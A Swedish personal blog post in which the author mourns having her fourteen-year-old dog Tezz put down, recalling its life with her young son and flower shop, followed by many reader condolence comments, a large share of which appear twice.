Älskade Tezz….. farväl…..

Åhhhh! Det gör så ont💔

Idag är en tung dag. Det är grått, kallt och tomt!

Igår eftermiddag fick vi säga hej då till våran älskade Tezz. Mitt hjärta blöder!!!!

 Vi spenderade eftermiddagen utomhus i trädgården… Innan jag senare på kvällen behövde åka in och låta avliva henne. 

bild-9577

Lilleman är född och uppvuxen med henne.

IMG_7526

Jag minns hur Tezz kom in i badrummet när jag fick mitt positiva graviditetstest med Lilleman. Jag skrek högt av glädje och Tezz undrade vad jag höll på med…. Jag minns första gången vi kom hem ifrån BB och Tezz försiktigt gick fram för att nosa på Ludvig då han satt i bilbarnstolen fastspänd. Hon la tassen på stolen som rörde sig och hoppade en halvmeter och med skräckblandad förtjusning la sig på ”säkert” avstånd ca en halvmeter och iakttog våran nya familjemedlem. Under kommande år har dom blivit ett ”team” Lilleman och Tezz. Han har matat henne med maten han själv inte orkat äta upp (bakom min rygg) han har försökt lägga skulden på henne inför mig om han tex, råkat haft ner något… (Vilket jag ALLTID genomskådade) plus att han då viskade till Tezz, ”våran hemlis Tezz, säg inget till mamma”….

Tezz skällde och signalerade till mig när han försökte krypa iväg för långt bort innan han lärde sig gå… Hon var den bästa nannyn jag kunnat haft! 

Varje morgon, varje dag har Tezz varit med mig och öppnat butiken My’s Blommor. I tio år gick hon vid min sida på plats bland blommor, medarbetare, kunde och allt som pågick i butiken… Jag minns när hon fick sin första kull.

-HERREGUD 7 valpar, ÖVERALLT!

 Jag har så många vackra, roliga och unika minnen med fina Tezz. Hon har varit med mig i med och motgång… sida vid sida. Pussat på mig varje morgon och sagt till mig ”Matte, nu ska vi gå ut”. Tröstat mig när jag varit ledsen. Lekt med Ludvig tills han inte orkat springa mer. Tezz ÄLSKAR att kasta boll/pinne. Hon kunde hålla på i evigheter… Tills Lilleman inte orkade mer  ☺️

-Tezz är min absolut BÄSTA vän! ❤️

 Lilleman frågar om hundhimmlen….. Han låg vaken brevid mig och grubblade till strax innan midnatt. 

Jag förklarar att Tezz är där nu, jagar Pinne leker med boll och tittar ner på oss ❤️

Han frågade hur hon kunde springa efter pinnen, när hon tidigare inte orkade det längre? Jag berättade att i hundhimlen känna man ingen smärta, man är stark, frisk och mår som man gjorde när man mådde som allra bäst. Man sover på en rosa bädd av fluffiga moln. 

-Jaha, svarade han lättat, då kan Tezz leka för alltid nu…  Sen somnade han, i min famn.

Då bröt jag ihop! Jag smög bort ifrån sängen och satte mig på balkongen. Där satt jag i timmar, grät, mindes… Tittade upppå ”hundhimmlen” och försökte intala mig att det är precis så som jag beskrivit det för Lilleman.

Jag ljög inte…. Men jag har heller inga garantier för hur det verkligen är. Vem har det? Men jag försöker starkt att intala mig att det är precis så som jag beskrev det… 

Jag förknippar hela mitt gamla liv med Tezz. På något konstigt sätt var detta ett avslut… På flera saker…. Jag är just nu helt knäckt!

Även om Tezz var 14 år, och jag hunnit förbereda mig lite på detta…. så är det ändå svårt att förlika sig med! Jag vill inte!!!!😰💔

Huvudvärk from hell! Kräktes på sjukhuset… ångest inombords. Jag är helt upp och ner.

Jag lämnade Lilleman hos barnvakt Igårkväll medan jag åkte in till veterinären  i Läckeby.

Jag sa förlåt till Tezz. Förlåt för att jag lämnade henne för ett år sedan… Jag höll om henne, klappade henne och förklarade hur mycket jag älskar henne av hela mitt hjärta.

Jag lät henne flytta till Lothar för ett år sedan, då det inte fungerade med mina jobb när vi alla bodde i Sigtuna, efter konkursen…

Jag minns hur jag övervägde där och då att sätta henne på ett hunddagis i Märsta. Men TACK och LOV så ringde farbror Lothar och talade mig till rätta!

-TACK farbror Lothar för att du gav Tezz ett sista år med möjlighet att bo och gå fri på landet tillsammns med dig, TACK!🙏🏻❤️

bild-9659

Hon var så trygg i min famn, hon slappnade av när jag kom hem igår. Veterinären berättade att hon förmodligen inte klarat mer än någon dag till… och att det är vanligt att dom väntar på matte/husse innan dom ger upp…

Väl framme på Läckeby djursjukhus fick jag fick bära henne. Till bilen, från. Bilen… in i det där hemska rummet…..Hon orkade inte gå själv.
25kg hund på axeln, ändå låg hon tryggt mot min hals…..

bild-9679

Det var precis som att hon väntat på just att vi skulle komma hem igår. Hon var MYCKET piggare sist vi hälsade på för bara några veckor sedan.

 Men igår slappnade hon av på ett annat sätt. Som att hon kände detta på sig . Hon ville inte mer. 

Hon blev sämre när hon låg i min famn, men jag kände samtidigt att hon var trygg. Jag grät tyst.. men mina tårar blötte ner hennes päls. Hon tröstade mig som vanligt och försökte slicka mig i ansiktet, (som hon alltid gjort). Men hon orkade lixom inte ens det… hon tittade på mig, jag tittade på henne…. Vi mötte varandras blickar och Jag kände hur vi förstod varandra, hon vet hur ledsen jag varit/är över att vi inte fick vårat sista år tillsammsn som vi brukat. Men hon vet också att jag gjorde det av ren och skär kärlek.

Jag var med henne, och även om hela mitt hjärta krampade och mina tårar aldrig slutade rinna så var jag lugn, min puls var låg, jag kände hennes puls mot min egen. Jag höll om henne hela vägen….. 

Hon var så trygg i min famn….  Hon somnade in i min famn…. drog en sista suck och jag såg hur hennes blick försvann…..

fina fina Tezz ❤️ Jag älskar dig, nu och för alltid!

Jag ska alltid minnas alla härliga år som vi fick tillsammans med dig!!!!

P5292943

Det var en ”fint” avslut, men ack så ont det gör!

Jag försökte resa mig och gå ifrån henne, när hon ”gått vidare” men det gick inte. Jag sa åt benen att resa mig, men kroppen lyssnade inte. Jag låg kvar vid hennes sida tills man skulle flytta henne….  Hon blev kall så fort. På ett obehagligt sätt.  Bara en liten stund innan så var hon ju sitt varma ”vanliga” jag ……

Personalen var väldigt omtänksamma. Dom behandlade henne så fint🙏🏻

Jag har förött skriva detta inlägget sedan imorse, men tårarna fortsätter rinna och jag avbryter det om och om igen……

/My Martens

178 Komentarer

 1. Usch vad jag lider med er. Det är det värsta med att vara djurägare, dessa tunga beslut. Även om man inte vill att de skall lida eller ha ont.
  Varm kram till er<3

 2. Åh gråter när jag läser ditt inlägg. Har en hund som är drygt 13 och en dag måste vi också ta ett tungt farväl. Så jobbigt att bara tänka tanken, men måste se till min hunds bästa, har ett ansvar. Kram

 3. Beklagar sorgen fina My❣️❣️❣️ du skriver så vackert och innerligt om din kärlek till Tezz och kärleken Er emellan att tårarna rinner nerför mina kinder. Ta hand om dig och din lilla familj. Styrkekramar genom cybervärlden Sara ?

 4. Jag vet hur ont det gör ❤️ Paniken & tomheten som infinner sig när man måste säga farväl till sin älskade vän❤️ Fina Tezz får springa i hundhimmlen med mina fina hundar king & Dina ❤️

 5. Du skriver av dej mycket vackert My, mina tårar rinner och jag tänker på den gången när jag själv blev tvungen att låta avliva familjens älskade hund. Tänker på er ❤❤❤

 6. Beklagar er sorg. Förstår hur ont det gör. Gråter när jag läser. Det är så obeskrivligt tungt och tomt utan våra fyrbenta familjemedlemmar.
  Vår Maxi blev bara 7 år p g a aggressiv obotlig cancer. Jag satt själv m honom på Ultuna när det var dags, innan cancern hunnit sprida sej, o tittade in i hans klocka vackra bruna ögon innan han slöt dom och somnade in. Fruktansvärt.. svårt att lämna honom och så tomt utan honom.. Jag vill också tänka att han har det bra i ”hundhimlen” tillsammans med vår lilla Tindra din Tezz och alla andra underbara ???

 7. Känner med dig My, det gör så ont när man är tvungen att göra detta!! ❤️ Som tur är så kommer det att kännas lättare med tiden!! Låt bara tårarna komma så du inte stänger in dom man måste få sörja en kär familjemedlem!! Man får försöka tänka på den underbara tid man fick tillsammans och tänk på att Tezz nu är med sina vänner i hundhimlen. Jag är säker på att min Leo som tyvärr fick lämna oss endast 6.5 år gammal tar hand om henne!! ❤️ ❤️
  Stora Kramar!! ❤️ ❤️

 8. Fyyyyyyyyy faaaaaan ❤️Bara tanken får mig att vilja spy…Tårarna rinner ner när jag läser ditt inlägg..Fina fina Tezz… Varje matte/husses mardröm, vill inte tänka tanken på att den dagen är oundviklig..Har själv en liten vovve som också är min bästa vän❤️Massor av kramar till dig fina My!
  Kram

 9. Finaste, vackraste Tess! En sådan trogen följeslagare, och glädjespridare hon har varit. Hoppas hon får många ben att gnaga på, och pinnar att springa efter och mycket kärlek och bus i hundhimlen;-) Att förlora ett djur, är lika jobbigt som en familjemedlem (om inte svårare säger jag, som har växt upp med djur som mina syskon) stor kram från BCN RIP Tess

 10. Så vackert skrivet! Jag har varit med om samma sak med både hund och katt. Det är fruktansvärt ? Jag har hälsat på din fina Tezz i din affär. Många kramar ❤

 11. Gråter så det gör ont i bröstet när jag läser…lider så med dig….Var med om samma sak för 3 år sen när vår älskade bordercollie som också var 14 fick somna in….Gråter fortfarande ofta över honom…även om vi har en ny liten goding nu,
  Stor Kram till dig<3<3<3

 12. Dessa underbara varelser som får oss att må så bra. Total kravlös kärlek!
  Lider med dig och tårarna rinner på mig när jag läser ditt fina avsked. Jag har mitt framför mig en dag. Kan inte se mig själv utan honom!
  Kram!

 13. Så ledsamt. Hon har varit älskad i hela sitt liv så hon har varit en lycklig hund. Hon somnade med dig vid sin sida när hennes liv var slut vid 14 år. Fina Tezz, lämnar många glada minnen efter sig. Nu var det skönt för hennes att få vila.❤

 14. Är så ledsen för eran skull ?
  Här själv förlorat husdjur och det är så sorgligt.
  Men tror också Tess springer fritt i himlen nu.
  Kram

 15. Tårarna sprutar här … jag har själv en underbar liten speciell vovve som nu är 9 år.
  ♥ ♥ ♥ RIP fina Tezz ♥ ♥ ♥
  Hon hade det så bra hos din släkting sista tiden, springa fritt i trädgården och bara vara hund ändå in i det sista.
  Beklagar verkligen, snyft tårarna bara rinner … o rinner … snyft. Är så blödig när det kommer till detta ämne ♥

 16. Usch vad jag lider med er. Det är det värsta med att vara djurägare, dessa tunga beslut. Även om man inte vill att de skall lida eller ha ont.
  Varm kram till er<3

 17. Åh gråter när jag läser ditt inlägg. Har en hund som är drygt 13 och en dag måste vi också ta ett tungt farväl. Så jobbigt att bara tänka tanken, men måste se till min hunds bästa, har ett ansvar. Kram

 18. Fina Tezz kom alltid och mötte mig när jag.kom och handlade. Men nu har hon det bra bortom regnbågen där hundarnas himmel finns leker på gröna ängar tänker på dig och Lilleman i er stora sorg efter en älskad familjemedlem bamsekramar ?❤❤❤❤

 19. Beklagar sorgen fina My❣️❣️❣️ du skriver så vackert och innerligt om din kärlek till Tezz och kärleken Er emellan att tårarna rinner nerför mina kinder. Ta hand om dig och din lilla familj. Styrkekramar genom cybervärlden Sara 💕

 20. Jag vet hur ont det gör ❤️ Paniken & tomheten som infinner sig när man måste säga farväl till sin älskade vän❤️ Fina Tezz får springa i hundhimmlen med mina fina hundar king & Dina ❤️

 21. Du skriver av dej mycket vackert My, mina tårar rinner och jag tänker på den gången när jag själv blev tvungen att låta avliva familjens älskade hund. Tänker på er ❤❤❤

 22. Beklagar er sorg. Förstår hur ont det gör. Gråter när jag läser. Det är så obeskrivligt tungt och tomt utan våra fyrbenta familjemedlemmar.

  Vår Maxi blev bara 7 år p g a aggressiv obotlig cancer. Jag satt själv m honom på Ultuna när det var dags, innan cancern hunnit sprida sej, o tittade in i hans klocka vackra bruna ögon innan han slöt dom och somnade in. Fruktansvärt.. svårt att lämna honom och så tomt utan honom.. Jag vill också tänka att han har det bra i ”hundhimlen” tillsammans med vår lilla Tindra din Tezz och alla andra underbara 💗💙💗

 23. Känner med dig My, det gör så ont när man är tvungen att göra detta!! ❤️ Som tur är så kommer det att kännas lättare med tiden!! Låt bara tårarna komma så du inte stänger in dom man måste få sörja en kär familjemedlem!! Man får försöka tänka på den underbara tid man fick tillsammans och tänk på att Tezz nu är med sina vänner i hundhimlen. Jag är säker på att min Leo som tyvärr fick lämna oss endast 6.5 år gammal tar hand om henne!! ❤️ ❤️
  Stora Kramar!! ❤️ ❤️

 24. Beklagar sorgen?.
  Det är så tungt å göra detta. Behövt gå igenom det tre ggr sista va för två år sedan. Hon va mitt allt och hon visste oxså att nu e det dags. Hon brukade alltid skaka när vi närma oss vetrinären men denna gång låg hon i min famn hela tiden å va jättelugn å vi såg i varandras ögon å ja visste att detta ville hon. Men tyvärr gör det ju inte mindre ont för det. Fortfarande så gråter jag när ja tänker på henne. Så My å Lilleman va rädda om er och krama om varandra. ?

 25. Beklagar My. Vet hur det känns. Är lite mer än två år sedan jag fick avliva min lilla Benji. Han var nästan 15år så det var ju inte oväntat. Men gjorde ju förbaskat ont ändå. Och gör även fortfarande då och då. Men jag brukar tänka, precis som du beskrev det för din son, att Benji är i hundhimlen och leker med alla andra hundar. Fånigt att tänka så när man är vuxen kanske. Men tänker så i vilket fall.

 26. Fyyyyyyyyy faaaaaan ❤️Bara tanken får mig att vilja spy…Tårarna rinner ner när jag läser ditt inlägg..Fina fina Tezz… Varje matte/husses mardröm, vill inte tänka tanken på att den dagen är oundviklig..Har själv en liten vovve som också är min bästa vän❤️Massor av kramar till dig fina My!
  Kram

 27. Finaste, vackraste Tess! En sådan trogen följeslagare, och glädjespridare hon har varit. Hoppas hon får många ben att gnaga på, och pinnar att springa efter och mycket kärlek och bus i hundhimlen;-) Att förlora ett djur, är lika jobbigt som en familjemedlem (om inte svårare säger jag, som har växt upp med djur som mina syskon) stor kram från BCN RIP Tess

 28. Jag har också suttit i ”det där” rummet med en älskad vän och det är så svårt men man vet i sitt hjärta att det är det enda rätta. Hoppas innerligt att du bara får fina, tröstande kommentarer! All värme och styrka till er.

 29. Jag försökte verkligen läsa hela texten i ditt inlägg idag. Men det gick inte.
  Jag kunde knappt andas när jag kom till hälften. Det är inte ofta man kan säga att man vet hur någon annan har det eller att man kan förstå någon annan eller veta hur någon annan känner och mena det till 100%. Vi går liksom inte i samma skor. Men när det kommer till detta, när det kommer till detta, så kan jag säga att jag vet precis. Jag kan känna och förstå varenda steg i processen. Jag vet hur ont det gör, ångesten innan, lättnaden efteråt. Och hela processen där emellan. Det är ett stort ansvar vi tar på oss när vi skaffar våra djur, med all vånda, men även den största glädjen, som berikar våra liv. Glöm aldrig att efter att ha gett djuren en bra liv, så är den absolut största kärlekshandlingen vi kan göra för dem just detta. Det är vidrigt, men ett beslut som vi är skyldiga att ta för deras skull när deras kroppar inte orkar mer. <3

 30. Så fint skrivet men så sorgligt, jag beklagar❤Jag vet vad du går igenom jag har själv fått ta farväl av min häst som jag hade i 21 år, den värsta dagen i mitt liv. Stor kram till dig o lilleman

 31. Så vackert skrivet! Jag har varit med om samma sak med både hund och katt. Det är fruktansvärt 😢 Jag har hälsat på din fina Tezz i din affär. Många kramar ❤

 32. Gråter så det gör ont i bröstet när jag läser…lider så med dig….Var med om samma sak för 3 år sen när vår älskade bordercollie som också var 14 fick somna in….Gråter fortfarande ofta över honom…även om vi har en ny liten goding nu,
  Stor Kram till dig<3<3<3

 33. Dessa underbara varelser som får oss att må så bra. Total kravlös kärlek!
  Lider med dig och tårarna rinner på mig när jag läser ditt fina avsked. Jag har mitt framför mig en dag. Kan inte se mig själv utan honom!
  Kram!

 34. Förstår dig, har varit i samma sits två gånger. Vill aldrig vara med om det igen därför ska jag inte ha fler hundar.
  Stor tröstekram fina My <3

 35. Så ledsamt. Hon har varit älskad i hela sitt liv så hon har varit en lycklig hund. Hon somnade med dig vid sin sida när hennes liv var slut vid 14 år. Fina Tezz, lämnar många glada minnen efter sig. Nu var det skönt för hennes att få vila.❤

 36. Är så ledsen för eran skull 💔
  Här själv förlorat husdjur och det är så sorgligt.
  Men tror också Tess springer fritt i himlen nu.
  Kram

 37. Tårarna sprutar här … jag har själv en underbar liten speciell vovve som nu är 9 år.

  ♥ ♥ ♥ RIP fina Tezz ♥ ♥ ♥

  Hon hade det så bra hos din släkting sista tiden, springa fritt i trädgården och bara vara hund ändå in i det sista.
  Beklagar verkligen, snyft tårarna bara rinner … o rinner … snyft. Är så blödig när det kommer till detta ämne ♥

 38. Vet hur det känns……..Två hundar och en katt har vandrat den vägen. Den tredje har nog inte så lång tid kvar, man är aldrig ordentligt förberedd fast man vet att den dagen kommer. Efter först hunden var borta hörde jag hennes tassande lång tid efter.
  KRAMAR till dig o ”Lilleman”

 39. Fina Tezz kom alltid och mötte mig när jag.kom och handlade. Men nu har hon det bra bortom regnbågen där hundarnas himmel finns leker på gröna ängar tänker på dig och Lilleman i er stora sorg efter en älskad familjemedlem bamsekramar 😢❤❤❤❤

 40. Åh tusen kramar till er. Vet sååå precis hur det känns. Min gamlis, min allra bästa vän var en katt, Gizmo. det var han, jag och min nu 21 åriga dotter genom allt. Han tröstade oss så många gånger, en pappa som svek, jag fick cancer 3 gånger, ensamstående mamma med dotter och häst. men han fanns alltid för oss, galen, tokig och vår vän.
  16 år var han med oss till han fick akut njursvikt. Och åter var det vi tre. Fast jag lovat honom att han skulle få somna in så blev det på Strömsholm mitt i natten.
  Jag sörjer fortfarande även om jag nu kan känna, efter 3 veckor att det var skönt att det gick fort. Saknar hon exakt varje dag.
  Åter…massa kramar <3

 41. Beklagar sorgen💖.
  Det är så tungt å göra detta. Behövt gå igenom det tre ggr sista va för två år sedan. Hon va mitt allt och hon visste oxså att nu e det dags. Hon brukade alltid skaka när vi närma oss vetrinären men denna gång låg hon i min famn hela tiden å va jättelugn å vi såg i varandras ögon å ja visste att detta ville hon. Men tyvärr gör det ju inte mindre ont för det. Fortfarande så gråter jag när ja tänker på henne. Så My å Lilleman va rädda om er och krama om varandra. 💜

 42. Beklagar My. Vet hur det känns. Är lite mer än två år sedan jag fick avliva min lilla Benji. Han var nästan 15år så det var ju inte oväntat. Men gjorde ju förbaskat ont ändå. Och gör även fortfarande då och då. Men jag brukar tänka, precis som du beskrev det för din son, att Benji är i hundhimlen och leker med alla andra hundar. Fånigt att tänka så när man är vuxen kanske. Men tänker så i vilket fall.

 43. De som aldrig haft en hund förstår inte dig och din sorg..
  Jag känner med dig och gråter när jag läser och ser er tillsammans för sista gången!
  Krama om din lilleman och tänk tillbaka på allt fint med henne!
  Tänker på er❤️
  Kramar om hårt

 44. Jag har också suttit i ”det där” rummet med en älskad vän och det är så svårt men man vet i sitt hjärta att det är det enda rätta. Hoppas innerligt att du bara får fina, tröstande kommentarer! All värme och styrka till er.

 45. Jag försökte verkligen läsa hela texten i ditt inlägg idag. Men det gick inte.
  Jag kunde knappt andas när jag kom till hälften. Det är inte ofta man kan säga att man vet hur någon annan har det eller att man kan förstå någon annan eller veta hur någon annan känner och mena det till 100%. Vi går liksom inte i samma skor. Men när det kommer till detta, när det kommer till detta, så kan jag säga att jag vet precis. Jag kan känna och förstå varenda steg i processen. Jag vet hur ont det gör, ångesten innan, lättnaden efteråt. Och hela processen där emellan. Det är ett stort ansvar vi tar på oss när vi skaffar våra djur, med all vånda, men även den största glädjen, som berikar våra liv. Glöm aldrig att efter att ha gett djuren en bra liv, så är den absolut största kärlekshandlingen vi kan göra för dem just detta. Det är vidrigt, men ett beslut som vi är skyldiga att ta för deras skull när deras kroppar inte orkar mer. <3

 46. Så fint skrivet men så sorgligt, jag beklagar❤Jag vet vad du går igenom jag har själv fått ta farväl av min häst som jag hade i 21 år, den värsta dagen i mitt liv. Stor kram till dig o lilleman

 47. Förstår dig, har varit i samma sits två gånger. Vill aldrig vara med om det igen därför ska jag inte ha fler hundar.
  Stor tröstekram fina My <3

 48. Vet hur det känns……..Två hundar och en katt har vandrat den vägen. Den tredje har nog inte så lång tid kvar, man är aldrig ordentligt förberedd fast man vet att den dagen kommer. Efter först hunden var borta hörde jag hennes tassande lång tid efter.
  KRAMAR till dig o ”Lilleman”

 49. Så fint du skriver ❤️ Tårarna rinner för fullt o jag minns hur det var för 2,5 år sedan när vi hade distriktsveterinären här hemma för att vår hund skulle få somna in hemma. Varma kramar ❤️❤️❤️

 50. Åh tusen kramar till er. Vet sååå precis hur det känns. Min gamlis, min allra bästa vän var en katt, Gizmo. det var han, jag och min nu 21 åriga dotter genom allt. Han tröstade oss så många gånger, en pappa som svek, jag fick cancer 3 gånger, ensamstående mamma med dotter och häst. men han fanns alltid för oss, galen, tokig och vår vän.
  16 år var han med oss till han fick akut njursvikt. Och åter var det vi tre. Fast jag lovat honom att han skulle få somna in så blev det på Strömsholm mitt i natten.
  Jag sörjer fortfarande även om jag nu kan känna, efter 3 veckor att det var skönt att det gick fort. Saknar hon exakt varje dag.

  Åter…massa kramar <3

 51. De som aldrig haft en hund förstår inte dig och din sorg..
  Jag känner med dig och gråter när jag läser och ser er tillsammans för sista gången!
  Krama om din lilleman och tänk tillbaka på allt fint med henne!
  Tänker på er❤️
  Kramar om hårt

 52. Mina varmaste tankar till dej. Vi tog bort våran cavalier några dagar före julafton ifjol. Det gjorde så ont så ont i mej även fast det var det bästa för honom. Båda barnen var liksom Lilleman uppväxta med honom, han var liksom vårt första barn här hemma. Kram och kärlek till dej.

 53. Så vackert du skriver om er älskade familjemedlem❤️
  Det är så sorgligt men ni gjorde det så fint för Tezz. Beklagar verkligen er sorg

 54. Det går sååå ont! Jag har varit med om det flera gånger med hund, katt och häst. När jag tog bort min första hund grät jag hela dagen både före och efter. Han visste! En lång tid efter kände jag hans närvaro och även om det kanske var inbillning var det ändå en tröst! Tess hade ett bra hundliv och du var den bästa matte hon kunde haft. Det märks i det du skriver.

 55. Styrke kramar till Er. ❤
  Tårarna kom så fort jag såg bilderna och började läsa. Vet precis hur det känns tog bort min golden som blev 14,5 år förra sommaren. Känns som en del av ens hjärta är borta och det tomrummet kommer alltid finnas där. Våra älskade djur.
  Ta hand om Er KRAM

 56. Så fint du skriver ❤️ Tårarna rinner för fullt o jag minns hur det var för 2,5 år sedan när vi hade distriktsveterinären här hemma för att vår hund skulle få somna in hemma. Varma kramar ❤️❤️❤️

 57. Skickar över styrkekramar till er båda. Aldrig roligt att behöva avliva ett djur som varit en del av ens liv i många år.
  Vackra bilder på er tillsammans.
  Kramar från mig

 58. Mina tårar rinner..
  Har varit med om det två gånger och det gör så ont.
  Saknaden är fruktansvärd, men alla goda minnen har ni kvar.
  Kram
  ”Om tårar var en trappa och minnerna en gränd,
  Skulle jag stiga upp till himmelen och hämta dig igen”

 59. Mina varmaste tankar till dej. Vi tog bort våran cavalier några dagar före julafton ifjol. Det gjorde så ont så ont i mej även fast det var det bästa för honom. Båda barnen var liksom Lilleman uppväxta med honom, han var liksom vårt första barn här hemma. Kram och kärlek till dej.

 60. Tårarna rinner, så tråkigt! Men det fanns inget annat att göra. Tänk på allt fint ni haft tillsammans, då kommer tacksamheten över gåvan att fått ha henne hos er alla år. Så har jag tänkt när det känts som svårast efter mina hundar. Det lindrar lite. Det är fruktansvärt jobbigt att lämna en älskad familjemedlem. Ta hand om er?

 61. Så vackert du skriver om er älskade familjemedlem❤️
  Det är så sorgligt men ni gjorde det så fint för Tezz. Beklagar verkligen er sorg

 62. Vad tråkigt att läsa ? Ramlade in på den här sidan av en slump och fick läsa denna sorgliga berättelse. Alltid lika svårt att mista en fyrfota vän. De är ju på något vis en del av oss och en stor del av livet. Beklagar verkligen förlusten av Tezz och hoppas att du och sonen ska kunna komma över den värsta sorgen och istället minnas alla de där ljusa minnena.
  Tröstkram/ Fredrik

 63. Det går sååå ont! Jag har varit med om det flera gånger med hund, katt och häst. När jag tog bort min första hund grät jag hela dagen både före och efter. Han visste! En lång tid efter kände jag hans närvaro och även om det kanske var inbillning var det ändå en tröst! Tess hade ett bra hundliv och du var den bästa matte hon kunde haft. Det märks i det du skriver.

 64. Beklagar sorgen.
  Blir ledsen och tårögd när jag läser dina ord.
  Fick ta bort min älskade och underbara katt för ett par år sen. Vet hur du känner.

 65. Styrke kramar till Er. ❤
  Tårarna kom så fort jag såg bilderna och började läsa. Vet precis hur det känns tog bort min golden som blev 14,5 år förra sommaren. Känns som en del av ens hjärta är borta och det tomrummet kommer alltid finnas där. Våra älskade djur.
  Ta hand om Er KRAM

 66. Jag beklagar verkligen. Blir så ledsen, men får hon frid där uppe i vovvehimlen. ❤️ aldrig kul att mista sin fina vän. Stor kram ❤️

 67. Vill framföra mitt varmaste deltagande i din svåra stund! Tårarna rinner när jag läser för jag känner så väl igen din smärta och din bottenlösa sorg! Jag var där för fyra år sen och det var den värsta tiden i mitt liv. Men det är viktigt att sörja! En sorg måste man gå igenom och inte runt! Med tiden lär man sig leva med sorgen även om saknaden aldrig försvinner. Tröstekram till dig! ??

 68. Skickar över styrkekramar till er båda. Aldrig roligt att behöva avliva ett djur som varit en del av ens liv i många år.

  Vackra bilder på er tillsammans.

  Kramar från mig

 69. Mina tårar rinner..
  Har varit med om det två gånger och det gör så ont.
  Saknaden är fruktansvärd, men alla goda minnen har ni kvar.
  Kram

  ”Om tårar var en trappa och minnerna en gränd,
  Skulle jag stiga upp till himmelen och hämta dig igen”

 70. Tårarna rinner, så tråkigt! Men det fanns inget annat att göra. Tänk på allt fint ni haft tillsammans, då kommer tacksamheten över gåvan att fått ha henne hos er alla år. Så har jag tänkt när det känts som svårast efter mina hundar. Det lindrar lite. Det är fruktansvärt jobbigt att lämna en älskad familjemedlem. Ta hand om er🤗

 71. Vad tråkigt att läsa 🙁 Ramlade in på den här sidan av en slump och fick läsa denna sorgliga berättelse. Alltid lika svårt att mista en fyrfota vän. De är ju på något vis en del av oss och en stor del av livet. Beklagar verkligen förlusten av Tezz och hoppas att du och sonen ska kunna komma över den värsta sorgen och istället minnas alla de där ljusa minnena.

  Tröstkram/ Fredrik

 72. Beklagar sorgen.
  Blir ledsen och tårögd när jag läser dina ord.
  Fick ta bort min älskade och underbara katt för ett par år sen. Vet hur du känner.

 73. Jag beklagar verkligen. Blir så ledsen, men får hon frid där uppe i vovvehimlen. ❤️ aldrig kul att mista sin fina vän. Stor kram ❤️

 74. Vill framföra mitt varmaste deltagande i din svåra stund! Tårarna rinner när jag läser för jag känner så väl igen din smärta och din bottenlösa sorg! Jag var där för fyra år sen och det var den värsta tiden i mitt liv. Men det är viktigt att sörja! En sorg måste man gå igenom och inte runt! Med tiden lär man sig leva med sorgen även om saknaden aldrig försvinner. Tröstekram till dig! 💔😢

 75. Så sorgligt när djur måste lämna, tårarna rinner när jag läser för jag vet hur det känns. Vilket fantastiskt hundliv hon har haft , med en matte som har tänkt på hennes bästa hela vägen. Stor kram

 76. Så sorgligt när djur måste lämna, tårarna rinner när jag läser för jag vet hur det känns. Vilket fantastiskt hundliv hon har haft , med en matte som har tänkt på hennes bästa hela vägen. Stor kram

 77. Kära My, Vet precis smärtan och sorgen som tar tag i en. . Man vet att man tagit rätt beslut som gör så outhärdligt ont. Har varit med om den några gånger. Och det är grymt. men av någon anledning blir det till fina minnen saknaden finns alltid men man glömmer aldrig dom fina minnena. Låt sorgen få ha sin gång….

 78. Kära My, Vet precis smärtan och sorgen som tar tag i en. . Man vet att man tagit rätt beslut som gör så outhärdligt ont. Har varit med om den några gånger. Och det är grymt. men av någon anledning blir det till fina minnen saknaden finns alltid men man glömmer aldrig dom fina minnena. Låt sorgen få ha sin gång….

 79. Så fint skrivet om en sorglig upplevelse.? Det låter som om Tezz har haft ett underbart liv med dig och att du tog det bästa beslutet för henne i slutet också. (även om det är ett av de tuffaste beslutet att ta).
  Försök att acceptera och inte känna för mycket skuld för att du lämnade bort henne till din bekant ett år, det låter ju trots allt som att hon hade det bättre där än på något hunddagis när hon var van att springa fritt. ?. Tycker att du fattade ett klokt beslut utifrån hennes bästa i åtanke.
  Försök att acceptera sorgen och bearbeta den nu istället för att tränga undan den, för den kommer att komma ifatt dig för eller senare ändå.
  Försök ta hand om dig själv i sorgen. Jag tycker du ska krama om Lilleman och krypa ner i soffan under en filt och bara var en stund, de flesta måsten (som träning och städning) kan vänta en dag eller två. <3<3

 80. Så fint skrivet om en sorglig upplevelse.😟 Det låter som om Tezz har haft ett underbart liv med dig och att du tog det bästa beslutet för henne i slutet också. (även om det är ett av de tuffaste beslutet att ta).

  Försök att acceptera och inte känna för mycket skuld för att du lämnade bort henne till din bekant ett år, det låter ju trots allt som att hon hade det bättre där än på något hunddagis när hon var van att springa fritt. 😉. Tycker att du fattade ett klokt beslut utifrån hennes bästa i åtanke.

  Försök att acceptera sorgen och bearbeta den nu istället för att tränga undan den, för den kommer att komma ifatt dig för eller senare ändå.

  Försök ta hand om dig själv i sorgen. Jag tycker du ska krama om Lilleman och krypa ner i soffan under en filt och bara var en stund, de flesta måsten (som träning och städning) kan vänta en dag eller två. <3<3

 81. Fina My. Oj vad ont detta gör att läsa och så gripande bilder på er med Tezz, För ett par år sedan var jag tvungen att avliva mina 2 norska skogskatter. Jag höll båda i min famn när livet försvann och jag såg på dem att det var okej.Kunde inte lämna dem efteråt Utan satt med dom i en bil 2 timmar innan vi begravde dem på den finaste platsen där våra hundar nu ligger och sover. Stor Kram och R.I.P Tezz

 82. Fina My. Oj vad ont detta gör att läsa och så gripande bilder på er med Tezz, För ett par år sedan var jag tvungen att avliva mina 2 norska skogskatter. Jag höll båda i min famn när livet försvann och jag såg på dem att det var okej.Kunde inte lämna dem efteråt Utan satt med dom i en bil 2 timmar innan vi begravde dem på den finaste platsen där våra hundar nu ligger och sover. Stor Kram och R.I.P Tezz

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

